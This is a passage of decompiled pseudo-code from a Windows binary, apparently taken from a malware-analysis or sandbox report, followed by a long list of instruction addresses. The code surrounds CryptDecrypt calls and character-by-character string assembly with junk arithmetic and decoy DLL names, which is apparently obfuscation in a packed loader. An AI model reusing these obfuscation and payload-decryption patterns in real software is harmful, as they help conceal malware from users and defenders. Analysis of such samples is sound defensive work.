									E0040A0C0( &_v36, _v40);
									_v88 = _v88 + 1;
								} while (_v88 != 0xd);
								_v68 = 0xda - _v84;
								E0040A0C0( &_v36, _v36);
								_v48 = _v52 - _v60;
								E0040A0C0( &_v36, _v36);
								_v32 = E006C0A40( *_v8);
								_v60 = _v72 + 0x25;
								_v84 = 0;
								do {
									_v68 = _v76 + _v92;
									E0040ACEC(_v40, 1, 1,  &_v36);
									_v84 = _v84 + 1;
								} while (_v84 != 7);
								_v64 = 0;
								while(_v64 < 4) {
									_v64 = _v64 + 1;
									_t1732 =  *0x8a9a44; // 0xa3011753
									 *0x8a9b28 = _t1732;
									_v80 = _v56 + _v52;
								}
								_v88 = 0;
								_t1324 =  *0x8a9a6c; // 0xfbe7a61a
								 *0x8a9b1c = _t1324;
								E0040ACEC(_v36, 0, 1,  &_v36);
								if(_v76 - _v80 < _v76) {
									 *0x8a9a78 = E008A9B04 * 0x6c;
								}
								_t1330 =  *0x8a9a74; // 0xedbf3fa1
								 *0x8a9ab4 = _t1330 - 0xa8;
								if(CryptDecrypt(_v24, 0, 0xffffffff, 0,  *( *_v8 + 4),  &_v32) != 0) {
									if(_v80 + 0x30 >= _v44) {
										__eflags = _v92 + _v72 - _v72;
										if(_v92 + _v72 <= _v72) {
											E0040A0C0( &_v40, _v36);
											E0040A0C0( &_v36, _v40);
											__eflags = 0;
											E0040ACEC(_v36, 0, 1,  &_v36);
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
										} else {
											E0040ACEC(_v36, 0, 1,  &_v36);
											E0040ACEC(_v36, 0, 1,  &_v40);
											E0040A0C0( &_v40, L"VarCyMulI8");
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
										}
										E0040ACEC(_v40, 1, 1,  &_v36);
										_t1512 =  *0x8a99d4; // 0x0
										_v124 = _t1512;
										__eflags = _v124;
										if(_v124 != 0) {
											_t1696 = _v124 - 4;
											__eflags = _t1696;
											_v124 =  *_t1696;
										}
										__eflags = _v124 - 0x2e;
										if(_v124 <= 0x2e) {
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v40, _v36);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
											E0040A0C0( &_v36, _v40);
										} else {
											E0040A0C0( &_v40, _v36);
											E0040ACEC(_v40, 1, 1,  &_v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v40, L"KBDBGPH.DLL");
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v36);
										}
										__eflags = 0;
										E0040ACEC(_v36, 0, 1,  &_v36);
									} else {
										_v52 = _v56 + 0xb3;
										_v80 = 0;
										while(_v80 < 5) {
											_v80 = _v80 + 1;
											_v44 = _v76 - 0xbe;
											_v92 = _v88 + 0x67;
											E0040A0C0( &_v40, _v40);
											E0040A0C0( &_v36, _v40);
											E0040A0C0( &_v36, _v36);
											E0040ACEC(_v36, 0, 1,  &_v40);
										}
										E0040ACEC(_v40, 1, 1,  &_v36);
									}
									E0040A0C0( &_v36, _v40);
									E0040ACEC(_v40, 1, 1,  &_v36);
									E0040ACEC(_v40, 1, 1,  &_v40);
									E0040A0C0( &_v36, L"RegGetKeySecurity");
									E0040A0C0( &_v36, L"RtlQuerySecurityObject");
									E006C0A5C( *_v8, _v32);
									_t2617 = 0x38 - _v72 - 0x27;
									if(0x38 - _v72 < 0x27) {
										_v60 = 0;
										_push(_v68);
										_t1658 =  *0x8a9b5c; // 0x8630d835
										_push(_t1658);
										_t2430 =  *0x8a9ad4; // 0xba811226
										E008736F0(_v84, _t2053, _v72, _t2430, _t2617);
										E0040A0C0( &_v36, L"spwmp.dll");
										_v72 = _v44 + _v84;
										E0040A0C0( &_v36, L"Microsoft.Windows.Diagnosis.TroubleshootingPack.resources.dll");
										_t1667 =  *0x8a9b4c; // 0x4d1a0eb9
										if(_t1667 -  *0x8a9a6c < 0x55) {
											_v68 = _v56 - 0x59;
											_v48 = _v88 * _v80;
											 *0x8a9b18 = 0x45 -  *0x8a9ba4;
											_t1675 =  *0x8a9b54; // 0xfcfc377e
											 *0x8a9bb0 = _t1675 + 0x74;
											_v312 = _v92 + 0xae;
											asm("fild dword [ebp-0x134]");
											_v52 = E004076E8();
											_t1680 =  *0x8a9b00; // 0xf8c6059a
											 *0x8a9b1c = _t1680 + 4;
										}
									}
									_t1545 =  *0x8a9b88; // 0x2c903efa
									 *0x8a9ac0 = _t1545 -  *0x8a9b38;
									E0040A0C0( &_v36, _v40);
									_t1549 =  *0x8a9b98; // 0xbc98d55c
									 *0x8a9ad8 = _t1549 *  *0x8a9b4c;
									 *0x8a9b78 = 0;
									E0087EB5C();
									 *0x8a9ad4 =  *0x8a9b78 * 0x1c;
									_v13 = 1;
									_v72 = _v80 * 0x6c;
									_t1555 =  *0x8aa288; // 0x8b091b
									_v125 =  *_t1555;
									if(_v125 + 0x9f - 0x1a < 0) {
										_v125 = _v125 - 0x20;
									}
									_t1560 =  *0x8a9ce4; // 0x8b0912
									_v126 =  *_t1560;
									if(_v126 + 0x9f - 0x1a < 0) {
										_v126 = _v126 - 0x20;
									}
									_t1565 =  *0x8aa288; // 0x8b091b
									_v127 =  *_t1565;
									if(_v127 + 0x9f - 0x1a < 0) {
										_v127 = _v127 - 0x20;
									}
									_t1570 =  *0x8a9cf4; // 0x8b0911
									_v128 =  *_t1570;
									if(_v128 + 0x9f - 0x1a < 0) {
										_t583 =  &_v128;
										 *_t583 = _v128 - 0x20;
										_t2627 =  *_t583;
									}
									E0040A3C0(0);
									_push(_v360);
									E0040A3C0(0);
									_push(_v364);
									E0040A3C0(0);
									_push(_v368);
									E0040A3C0(0);
									_push(_v372);
									E0040A3C0(0);
									_push(_v376);
									E0040A3C0(0);
									_push(_v380);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v384);
									E0040A3C0(0);
									_push(_v388);
									E0040A3C0(0);
									_push(_v392);
									E0040A3C0(0);
									_push(_v396);
									E0040A3C0(0);
									_push(_v400);
									E0040A3C0(0);
									_push(_v404);
									E0040A3C0(0);
									_push(_v408);
									E0040A3C0(0);
									_push(_v412);
									E0040A3C0(0);
									_push(_v416);
									E0040A3C0(0);
									_push(_v420);
									E0040A3C0(0);
									_push(_v424);
									E0040A3C0(0);
									_push(_v428);
									E0040A3C0(0);
									_push(_v432);
									E0040A3C0(0);
									_push(_v436);
									E0040A3C0(0);
									_push(_v440);
									E0040A3C0(0);
									_push(_v444);
									E0040A3C0(0);
									_push(_v448);
									E0040A3C0(0);
									_push(_v452);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v456);
									E0040A3C0(0);
									_push(_v460);
									E0040A3C0(0);
									_push(_v464);
									E0040A3C0(0);
									_push(_v468);
									E0040A3C0(0);
									_push(_v472);
									E0040A3C0(0);
									_push(_v476);
									E0040A3C0(0);
									_push(_v480);
									_push(0x88532c);
									E0040A3C0(0);
									_push(_v484);
									E0040A3C0(0);
									_push(_v488);
									E0040A3C0(0);
									E0040A494( &_v356, _t2053, 0x25, _t2561, _t2562);
									E0040A9E8( &_v36, _v356, _v492);
									_v52 = 0;
									E00870FD8( &_v68, 0x8a9a54, _t2627);
									_v88 = 0;
									do {
										_v60 = _v48 - 0x82;
										_v88 = _v88 + 1;
									} while (_v88 != 5);
									_t1653 =  *0x8a9a38; // 0x438e1da9
									 *0x8a9ad8 = _t1653;
									E0040A0C0( &_v36, _v40);
								}
								_pop(_t2267);
								 *[fs:eax] = _t2267;
								_push(E0088359D);
								_v88 = 0;
								do {
									if(_v72 + _v80 < _v72 + _v72) {
										_v64 = _v56 * _v80;
										_v44 = _v72 * 0xf7;
										_v60 = _v68 + 0x70;
										E0040A0C0( &_v40, _v36);
										_t1443 =  &_v264;
										_t2302 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1443 + 1)) =  *_t2302;
										 *_t1443 = 1;
										E0040A324( &_v268,  &_v264);
										_t1446 =  &_v272;
										_t2305 =  *0x8aa288; // 0x8b091b
										 *((char*)(_t1446 + 1)) =  *_t2305;
										 *_t1446 = 1;
										E0040A34C( &_v268, 2,  &_v272);
										E0040A324( &_v312,  &_v268);
										_t1451 =  &_v272;
										_t2309 =  *0x8a9c3c; // 0x8b0918
										 *((char*)(_t1451 + 1)) =  *_t2309;
										 *_t1451 = 1;
										E0040A34C( &_v312, 3,  &_v272);
										E0040A324( &_v500,  &_v312);
										_t1456 =  &_v272;
										_t2313 =  *0x8aa080; // 0x8b0916
										 *((char*)(_t1456 + 1)) =  *_t2313;
										 *_t1456 = 1;
										E0040A34C( &_v500, 4,  &_v272);
										E0040A324( &_v508,  &_v500);
										_t1461 =  &_v272;
										_t2317 =  *0x8aa0b8; // 0x8b0928
										 *((char*)(_t1461 + 1)) =  *_t2317;
										 *_t1461 = 1;
										E0040A34C( &_v508, 5,  &_v272);
										E0040A324( &_v516,  &_v508);
										_t1466 =  &_v272;
										_t2321 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1466 + 1)) =  *_t2321;
										 *_t1466 = 1;
										E0040A34C( &_v516, 6,  &_v272);
										E0040A324( &_v524,  &_v516);
										E0040A34C( &_v524, 7, 0x885618);
										E0040A324( &_v536,  &_v524);
										_t1475 =  &_v272;
										_t2327 =  *0x8aa15c; // 0x8b091c
										 *((char*)(_t1475 + 1)) =  *_t2327;
										 *_t1475 = 1;
										E0040A34C( &_v536, 8,  &_v272);
										E0040A324( &_v548,  &_v536);
										_t1480 =  &_v272;
										_t2331 =  *0x8a9f14; // 0x8b0922
										 *((char*)(_t1480 + 1)) =  *_t2331;
										 *_t1480 = 1;
										E0040A34C( &_v548, 9,  &_v272);
										E0040A324( &_v560,  &_v548);
										_t1485 =  &_v272;
										_t2335 =  *0x8a9f14; // 0x8b0922
										 *((char*)(_t1485 + 1)) =  *_t2335;
										 *_t1485 = 1;
										E0040A34C( &_v560, 0xa,  &_v272);
										E0040AA98( &_v560);
										E0040A0C0( &_v36, _v40);
									}
									E0040A0C0( &_v40, L"MmcAspExt.dll");
									E0040ACEC(_v40, 1, 1,  &_v36);
									E0040A0C0( &_v36, _v36);
									_v88 = _v88 + 1;
								} while (_v88 != 0xb);
								E0040ACEC(_v40, 1, 1,  &_v36);
								if(_v76 - _v68 < 0x7a) {
									E0040A0C0( &_v40, _v40);
									E0040A0C0( &_v36, _v36);
									E0040ACEC(_v36, 0, 1,  &_v36);
									E0040A0C0( &_v36, _v40);
									E0040A0C0( &_v40, L"mswmdm.dll");
									E0040A0C0( &_v40, _v40);
								}
								if(_v76 + 0xb8 >= _v72) {
									_t1356 =  *0x8a99d4; // 0x0
									E0040ACB4(_t1356, L"DevicePairingHandler.dll");
									if(__eflags != 0) {
										E0040A0C0( &_v36, _v36);
										E0040A0C0( &_v40, L"mssitlb.dll");
										E0040A0C0( &_v40, _v36);
										E0040A0C0( &_v36, _v40);
										__eflags = 0;
										E0040ACEC(_v36, 0, 1,  &_v36);
										E0040A0C0( &_v40, _v36);
									} else {
										E0040ACEC(_v36, 0, 1,  &_v36);
										E0040A0C0( &_v36, _v40);
										E0040A0C0( &_v40, _v40);
										E0040A0C0( &_v40, _v36);
										E0040A0C0( &_v36, _v40);
										E0040A0C0( &_v36, _v36);
									}
								} else {
									E0040A0C0( &_v36, _v36);
								}
								E0040A0C0( &_v36, _v40);
								E0040A0C0( &_v36, _v40);
								CryptDestroyKey(_v24);
								_v312 = _v48 + 0x17;
								asm("fild dword [ebp-0x134]");
								_v64 = E004076E8();
								E0040A0C0( &_v36, _v40);
								_t1382 =  *0x8a9a58; // 0x4192234
								 *0x8a9b24 = _t1382;
								_v56 = 0;
								_push(_v80);
								_push(_v88);
								_t2284 =  *0x8a9ba0; // 0x6009aac0
								E0087039C(_v44, _t2053, _t2284, _t2561, _t2562);
								_t2285 =  *0x8a9b10; // 0x0
								if(E0040AEFC(L"igd10umd32.dll", 1, _t2285) != 0x49) {
									_v84 = 0;
									do {
										_v92 = _v44 + 4;
										_v312 = _v52 + 0x7d;
										asm("fild dword [ebp-0x134]");
										_v68 = E004076E8();
										_t1401 =  *0x8a9a78; // 0x60792c44
										 *0x8a9b14 = _t1401 - 0xf6;
										_t1403 =  *0x8a9bbc; // 0x6009aad7
										 *0x8a9ba4 = _t1403 + 4;
										 *0x8a9ae8 =  *0x8a9a94 * 0x87;
										_t1406 =  *0x8a9b50; // 0x36c714d5
										 *0x8a9b98 = _t1406 +  *0x8a9b90;
										_v84 = _v84 + 1;
									} while (_v84 != 0x10);
								}
								_t1390 = _v36;
								_v132 = _t1390;
								if(_v132 != 0) {
									_t1390 =  *((intOrPtr*)(_v132 - 4));
									_v132 = _t1390;
								}
								if(_v132 > 0xa6) {
									_t1391 =  *0x8a9b54; // 0xfcfc377e
									_t1392 = _t1391 *  *0x8a9bc0;
									 *0x8a9ae4 = _t1392;
									return _t1392;
								}
								return _t1390;
							}
						}
					}
				}
			}


























































































































































































































































































      0x00881940
      0x00881940
      0x00881940
      0x00881941
      0x00881943
      0x00881948
      0x00881948
      0x0088194a
      0x0088194c
      0x0088194c
      0x0088194f
      0x00881950
      0x00881951
      0x00881952
      0x00881955
      0x0088195b
      0x00881962
      0x00881963
      0x00881968
      0x0088196b
      0x0088196e
      0x00881974
      0x00881975
      0x0088197a
      0x0088197d
      0x00881986
      0x00881993
      0x00881998
      0x0088199f
      0x008819d6
      0x008819dd
      0x008819e7
      0x008819e9
      0x008819e9
      0x008819ed
      0x008819f4
      0x008819fe
      0x00881a00
      0x00881a00
      0x00881a04
      0x00881a0b
      0x00881a15
      0x00881a17
      0x00881a17
      0x00881a1b
      0x00881a22
      0x00881a2c
      0x00881a2e
      0x00881a2e
      0x00881a40
      0x00881a45
      0x00881a5e
      0x00881a63
      0x00881a7c
      0x00881a81
      0x00881a9a
      0x00881a9f
      0x00881ab8
      0x00881abd
      0x00881ad6
      0x00881adb
      0x00881af4
      0x00881af9
      0x00881b0d
      0x00881b12
      0x00881b26
      0x00881b2b
      0x00881b3f
      0x00881b44
      0x00881b58
      0x00881b5d
      0x00881b76
      0x00881b7b
      0x00881b94
      0x00881b99
      0x00881bb2
      0x00881bb7
      0x00881bcb
      0x00881bd0
      0x00881be9
      0x00881bee
      0x00881c07
      0x00881c0c
      0x00881c25
      0x00881c2a
      0x00881c43
      0x00881c48
      0x00881c61
      0x00881c66
      0x00881c7f
      0x00881c84
      0x00881c9d
      0x00881ca2
      0x00881cbb
      0x00881cd1
      0x00881cdf
      0x00881ce6
      0x00881cf1
      0x00881cfc
      0x00881d05
      0x00881d12
      0x00881d1d
      0x00881d28
      0x00881d38
      0x00881d3f
      0x00881d49
      0x00881d4b
      0x00881d4b
      0x00881d4f
      0x00881d56
      0x00881d60
      0x00881d62
      0x00881d62
      0x00881d62
      0x00881d62
      0x00881d66
      0x00881d6c
      0x00881d74
      0x00881d77
      0x00881d86
      0x00881d8b
      0x00881d91
      0x00881d99
      0x00881d9c
      0x00881dad
      0x00881dc3
      0x00881dc8
      0x00881ddc
      0x00881de1
      0x00881dfa
      0x00881dff
      0x00881e18
      0x00881e1d
      0x00881e31
      0x00881e36
      0x00881e4f
      0x00881e54
      0x00881e6d
      0x00881e72
      0x00881e78
      0x00881e90
      0x00881e95
      0x00881eae
      0x00881eb3
      0x00881ecc
      0x00881ee2
      0x00881ef0
      0x00881ef0
      0x00881f07
      0x00881f1d
      0x00881f30
      0x00881f44
      0x00881f4a
      0x00881f4c
      0x00884e70
      0x00884e72
      0x00884e75
      0x00884e77
      0x00884e7a
      0x00884e7e
      0x00884e80
      0x00884e87
      0x00884e90
      0x00884e9b
      0x00884ea5
      0x00884eb5
      0x00884eba
      0x00884ec5
      0x00884eca
      0x00884eca
      0x00884ed0
      0x00884ed3
      0x00884ed3
      0x00884edf
      0x00884ee6
      0x00884eeb
      0x00884ef0
      0x00884efa
      0x00884eff
      0x00884f0a
      0x00884f17
      0x00884f1e
      0x00884f21
      0x0088521e
      0x00885220
      0x00885223
      0x00885226
      0x00885236
      0x00885246
      0x00885251
      0x00885261
      0x0088526c
      0x0088527c
      0x0088528c
      0x0088529c
      0x008852ac
      0x008852bc
      0x008852c7
      0x008852d4
      0x008852e1
      0x00881f52
      0x00881f5a
      0x00881f5f
      0x00881f6d
      0x00881f72
      0x00881f75
      0x00881f79
      0x00881f7e
      0x00881f7e
      0x00881f83
      0x00881f83
      0x00881f86
      0x00881f8a
      0x00881f94
      0x00881f9a
      0x00881fa5
      0x00881fae
      0x00881fb7
      0x00881fba
      0x00881fc5
      0x00881fca
      0x00881fcf
      0x00881fcf
      0x00881fd2
      0x00881fd7
      0x00881fdc
      0x00881fdc
      0x00881f61
      0x00881f63
      0x00881f66
      0x00881f66
      0x00881fe1
      0x00881fec
      0x00881ff7
      0x00882002
      0x00882009
      0x0088200c
      0x00882010
      0x00882012
      0x00882017
      0x00882029
      0x0088202e
      0x0088203d
      0x0088211d
      0x00882122
      0x00882122
      0x00882125
      0x00882043
      0x00882056
      0x008820c5
      0x008820cf
      0x008820d4
      0x008820de
      0x008820e3
      0x008820ed
      0x008820fc
      0x00882101
      0x00882109
      0x0088210e
      0x00882116
      0x00882058
      0x00882058
      0x00882063
      0x00882072
      0x00882081
      0x00882091
      0x00882096
      0x008820a0
      0x008820a5
      0x008820ad
      0x008820b3
      0x008820be
      0x008820be
      0x00882056
      0x0088212c
      0x0088212d
      0x00882132
      0x00882135
      0x0088213a
      0x00882141
      0x00882143
      0x0088214c
      0x0088214f
      0x0088214f
      0x00882157
      0x0088215c
      0x00882165
      0x0088216d
      0x00882178
      0x00882181
      0x0088218a
      0x00882192
      0x00882193
      0x00882195
      0x00882197
      0x0088219f
      0x008821a8
      0x00884a5b
      0x00884a5e
      0x00884a61
      0x00884a6c
      0x00884a80
      0x00884a8b
      0x00884a90
      0x00884a93
      0x00884a97
      0x00884a99
      0x00884a9e
      0x00884aa1
      0x00884aa5
      0x00884aa7
      0x00884ab2
      0x00884abb
      0x00884ad1
      0x00884adf
      0x00884ae8
      0x00884af3
      0x00884af8
      0x00884af8
      0x00884afe
      0x00884afe
      0x00884b0a
      0x00884b15
      0x00884b1e
      0x00884b2d
      0x008821ae
      0x008821b0
      0x008821b1
      0x008821b6
      0x008821b9
      0x008821bc
      0x008821c6
      0x008821cb
      0x008822e6
      0x008822e9
      0x008822ef
      0x008822f6
      0x008822fe
      0x00882300
      0x00882302
      0x00882302
      0x00882302
      0x00882302
      0x00882306
      0x0088230d
      0x00882315
      0x00882317
      0x00882319
      0x00882319
      0x00882319
      0x00882319
      0x0088231d
      0x00882324
      0x0088232c
      0x0088232e
      0x00882330
      0x00882330
      0x00882330
      0x00882330
      0x00882334
      0x0088233b
      0x00882343
      0x00882345
      0x00882347
      0x00882347
      0x00882347
      0x00882347
      0x0088234b
      0x00882352
      0x0088235a
      0x0088235c
      0x0088235e
      0x0088235e
      0x0088235e
      0x0088235e
      0x00882362
      0x00882369
      0x00882371
      0x00882373
      0x00882375
      0x00882375
      0x00882375
      0x00882375
      0x00882379
      0x00882380
      0x00882388
      0x0088238a
      0x0088238c
      0x0088238c
      0x0088238c
      0x0088238c
      0x00882390
      0x00882397
      0x0088239f
      0x008823a1
      0x008823a3
      0x008823a3
      0x008823a3
      0x008823a3
      0x008823a7
      0x008823ae
      0x008823b6
      0x008823b8
      0x008823ba
      0x008823ba
      0x008823ba
      0x008823ba
      0x008823cc
      0x008823d1
      0x008823e5
      0x008823ea
      0x008823fe
      0x00882403
      0x00882417
      0x0088241c
      0x00882430
      0x00882435
      0x00882449
      0x0088244e
      0x00882454
      0x00882467
      0x0088246c
      0x00882480
      0x00882485
      0x00882499
      0x008824af
      0x008824bd
      0x008824c8
      0x008824d3
      0x008824de
      0x008824f4
      0x008824ff
      0x008824ff
      0x008821d1
      0x008821da
      0x008821dc
      0x008821e4
      0x008821ee
      0x008821f9
      0x00882202
      0x0088220b
      0x00882216
      0x00882216
      0x00882220
      0x00882233
      0x00882295
      0x008822a2
      0x008822ad
      0x008822b8
      0x008822c3
      0x008822d6
      0x00882235
      0x00882246
      0x00882251
      0x0088225c
      0x0088226f
      0x0088227a
      0x00882285
      0x00882285
      0x00882233
      0x0088250d
      0x00882545
      0x00882550
      0x0088255d
      0x0088250f
      0x00882515
      0x00882520
      0x0088252b
      0x00882538
      0x00882538
      0x00882568
      0x00882573
      0x0088257e
      0x00882589
      0x00882591
      0x00882598
      0x008825a2
      0x008825a2
      0x008825a5
      0x008825aa
      0x008825ae
      0x008825b2
      0x008825bb
      0x00883c3f
      0x00883c45
      0x00883c50
      0x00883c53
      0x00883c5b
      0x00883c61
      0x00883c6a
      0x00883c73
      0x00883c7a
      0x00883c7d
      0x00883c80
      0x00883c8d
      0x00883c98
      0x00883ca3
      0x00883cac
      0x00883cb5
      0x00883cb8
      0x00883d20
      0x00883cba
      0x00883cc2
      0x00883cc5
      0x00883cd8
      0x00883ce3
      0x00883cee
      0x00883cf9
      0x00883d04
      0x00883d11
      0x00883d11
      0x00883cc5
      0x00883d27
      0x00883d28
      0x00883d2d
      0x00883d30
      0x00883d33
      0x00883d3a
      0x00883d48
      0x00883d4a
      0x00883d4c
      0x00883d4c
      0x00883d4c
      0x00883d4c
      0x00883d53
      0x00883d5a
      0x00883d68
      0x00883d6a
      0x00883d6c
      0x00883d6c
      0x00883d6c
      0x00883d6c
      0x00883d73
      0x00883d7a
      0x00883d88
      0x00883d8a
      0x00883d8c
      0x00883d8c
      0x00883d8c
      0x00883d8c
      0x00883d93
      0x00883d9a
      0x00883da8
      0x00883daa
      0x00883dac
      0x00883dac
      0x00883dac
      0x00883dac
      0x00883dc4
      0x00883dc9
      0x00883de0
      0x00883de5
      0x00883dfc
      0x00883e01
      0x00883e18
      0x00883e1d
      0x00883e2e
      0x00883e33
      0x00883e41
      0x00883e46
      0x00883e54
      0x00883e59
      0x00883e5f
      0x00883e6f
      0x00883e74
      0x00883e7b
      0x00883e89
      0x00883e8b
      0x00883e8d
      0x00883e8d
      0x00883e8d
      0x00883e8d
      0x00883e94
      0x00883e9b
      0x00883ea9
      0x00883eab
      0x00883ead
      0x00883ead
      0x00883ead
      0x00883ead
      0x00883eb4
      0x00883ebb
      0x00883ec9
      0x00883ecb
      0x00883ecd
      0x00883ecd
      0x00883ecd
      0x00883ecd
      0x00883ed4
      0x00883eeb
      0x00883ef0
      0x00883f07
      0x00883f0c
      0x00883f23
      0x00883f39
      0x00883f47
      0x00883f4c
      0x00883f4e
      0x00883f51
      0x00883f54
      0x00883f64
      0x008825c1
      0x008825c3
      0x008825ca
      0x008825cc
      0x008825d7
      0x008825dd
      0x008825e8
      0x008825eb
      0x008825f1
      0x008825fb
      0x00882608
      0x0088260b
      0x00882615
      0x0088261b
      0x0088262e
      0x00882630
      0x00882633
      0x00882639
      0x0088263c
      0x00882646
      0x0088264b
      0x00882656
      0x0088265b
      0x00882666
      0x0088266b
      0x00882676
      0x00882682
      0x00882687
      0x0088268a
      0x0088268a
      0x0088261d
      0x0088261d
      0x00882627
      0x00882627
      0x00882690
      0x0088269b
      0x008826a1
      0x008826b2
      0x008826b4
      0x008826b9
      0x008826c1
      0x008826d8
      0x008826a3
      0x008826a3
      0x008826ab
      0x008826ab
      0x008826dd
      0x008826e5
      0x008826eb
      0x008826f6
      0x0088270e
      0x00882716
      0x00000000
      0x0088271c
      0x0088271e
      0x0088271f
      0x00882724
      0x00882727
      0x00882730
      0x00882737
      0x0088273a
      0x00882740
      0x00882746
      0x00882751
      0x0088275a
      0x0088275f
      0x00882762
      0x00882770
      0x00882779
      0x00882784
      0x0088278d
      0x0088279c
      0x008827a5
      0x008827aa
      0x008827ad
      0x008827b3
      0x008827c7
      0x008827cc
      0x008827cf
      0x008827d7
      0x008827de
      0x008827e0
      0x008827e3
      0x008827e8
      0x008827f3
      0x008827f6
      0x008827fe
      0x00882801
      0x00882806
      0x00882819
      0x00882832
      0x0088283b
      0x0088283b
      0x00882840
      0x0088284a
      0x0088286e
      0x0088287d
      0x0088290b
      0x0088290e
      0x0088296c
      0x00882977
      0x00882980
      0x0088298a
      0x00882995
      0x008829a0
      0x008829ab
      0x00882910
      0x0088291e
      0x00882931
      0x0088293e
      0x00882949
      0x00882954
      0x0088295f
      0x0088295f
      0x008829c1
      0x008829c6
      0x008829cb
      0x008829ce
      0x008829d2
      0x008829d7
      0x008829d7
      0x008829dc
      0x008829dc
      0x008829df
      0x008829e3
      0x00882a3c
      0x00882a47
      0x00882a52
      0x00882a5d
      0x00882a68
      0x00882a73
      0x008829e5
      0x008829eb
      0x00882a01
      0x00882a0c
      0x00882a19
      0x00882a24
      0x00882a2f
      0x00882a2f
      0x00882a7c
      0x00882a86
      0x00882883
      0x0088288b
      0x00882890
      0x00882897
      0x00882899
      0x008828a4
      0x008828ad
      0x008828b6
      0x008828c1
      0x008828cc
      0x008828df
      0x008828e4
      0x008828fb
      0x008828fb
      0x00882a91
      0x00882aa7
      0x00882abd
      0x00882aca
      0x00882ad7
      0x00882ae4
      0x00882af1
      0x00882af4
      0x00882afc
      0x00882b02
      0x00882b03
      0x00882b08
      0x00882b0c
      0x00882b15
      0x00882b22
      0x00882b2d
      0x00882b38
      0x00882b3d
      0x00882b4b
      0x00882b53
      0x00882b5c
      0x00882b6a
      0x00882b6f
      0x00882b77
      0x00882b84
      0x00882b8a
      0x00882b95
      0x00882b98
      0x00882ba0
      0x00882ba0
      0x00882b4b
      0x00882ba5
      0x00882bb0
      0x00882bbb
      0x00882bc0
      0x00882bcb
      0x00882bd2
      0x00882bd7
      0x00882be3
      0x00882be8
      0x00882bf0
      0x00882bf3
      0x00882bfa
      0x00882c04
      0x00882c06
      0x00882c06
      0x00882c0a
      0x00882c11
      0x00882c1b
      0x00882c1d
      0x00882c1d
      0x00882c21
      0x00882c28
      0x00882c32
      0x00882c34
      0x00882c34
      0x00882c38
      0x00882c3f
      0x00882c49
      0x00882c4b
      0x00882c4b
      0x00882c4b
      0x00882c4b
      0x00882c5d
      0x00882c62
      0x00882c7b
      0x00882c80
      0x00882c99
      0x00882c9e
      0x00882cb7
      0x00882cbc
      0x00882cd5
      0x00882cda
      0x00882cf3
      0x00882cf8
      0x00882cfe
      0x00882d11
      0x00882d16
      0x00882d2f
      0x00882d34
      0x00882d4d
      0x00882d52
      0x00882d6b
      0x00882d70
      0x00882d89
      0x00882d8e
      0x00882da7
      0x00882dac
      0x00882dc5
      0x00882dca
      0x00882de3
      0x00882de8
      0x00882e01
      0x00882e06
      0x00882e1f
      0x00882e24
      0x00882e38
      0x00882e3d
      0x00882e56
      0x00882e5b
      0x00882e74
      0x00882e79
      0x00882e92
      0x00882e97
      0x00882eb0
      0x00882eb5
      0x00882ece
      0x00882ed3
      0x00882eec
      0x00882ef1
      0x00882f0a
      0x00882f0f
      0x00882f15
      0x00882f28
      0x00882f2d
      0x00882f46
      0x00882f4b
      0x00882f64
      0x00882f69
      0x00882f82
      0x00882f87
      0x00882fa0
      0x00882fa5
      0x00882fbe
      0x00882fc3
      0x00882fdc
      0x00882fe1
      0x00882fe7
      0x00882fff
      0x00883004
      0x0088301d
      0x00883022
      0x0088303b
      0x00883051
      0x0088305f
      0x00883066
      0x00883071
      0x00883078
      0x0088307b
      0x00883083
      0x00883086
      0x00883089
      0x0088308f
      0x00883094
      0x0088309f
      0x0088309f
      0x008830a6
      0x008830a9
      0x008830ac
      0x008830b3
      0x008830b6
      0x008830c4
      0x008830d0
      0x008830da
      0x008830e3
      0x008830ec
      0x008830f1
      0x008830f7
      0x008830ff
      0x00883102
      0x00883111
      0x00883116
      0x0088311c
      0x00883124
      0x00883127
      0x00883138
      0x00883149
      0x0088314e
      0x00883154
      0x0088315c
      0x0088315f
      0x00883170
      0x00883181
      0x00883186
      0x0088318c
      0x00883194
      0x00883197
      0x008831a8
      0x008831b9
      0x008831be
      0x008831c4
      0x008831cc
      0x008831cf
      0x008831e0
      0x008831f1
      0x008831f6
      0x008831fc
      0x00883204
      0x00883207
      0x00883218
      0x00883229
      0x0088323b
      0x0088324c
      0x00883251
      0x00883257
      0x0088325f
      0x00883262
      0x00883273
      0x00883284
      0x00883289
      0x0088328f
      0x00883297
      0x0088329a
      0x008832ab
      0x008832bc
      0x008832c1
      0x008832c7
      0x008832cf
      0x008832d2
      0x008832e3
      0x008832f1
      0x008832fc
      0x008832fc
      0x00883309
      0x0088331f
      0x0088332a
      0x0088332f
      0x00883332
      0x0088334d
      0x0088335b
      0x00883363
      0x0088336e
      0x00883381
      0x0088338c
      0x00883399
      0x008833a4
      0x008833a4
      0x008833b4
      0x008833c6
      0x008833d0
      0x008833d5
      0x00883429
      0x00883436
      0x00883441
      0x0088344c
      0x00883455
      0x0088345f
      0x0088346a
      0x008833d7
      0x008833e5
      0x008833f0
      0x008833fb
      0x00883406
      0x00883411
      0x0088341c
      0x0088341c
      0x008833b6
      0x008833bc
      0x008833bc
      0x00883475
      0x00883480
      0x00883489
      0x00883495
      0x0088349b
      0x008834a6
      0x008834af
      0x008834b4
      0x008834b9
      0x008834c0
      0x008834c6
      0x008834ca
      0x008834ce
      0x008834d7
      0x008834e1
      0x008834f4
      0x008834f8
      0x008834fb
      0x00883501
      0x0088350a
      0x00883510
      0x0088351b
      0x0088351e
      0x00883528
      0x0088352d
      0x00883535
      0x00883544
      0x00883549
      0x00883554
      0x00883559
      0x0088355c
      0x008834fb
      0x00883562
      0x00883565
      0x0088356c
      0x00883574
      0x00883576
      0x00883576
      0x00883580
      0x00883582
      0x00883587
      0x0088358d
      0x00000000
      0x0088358d
      0x00883592
      0x00883592
      0x00882716
      0x008825bb
      0x008821a8

      Strings
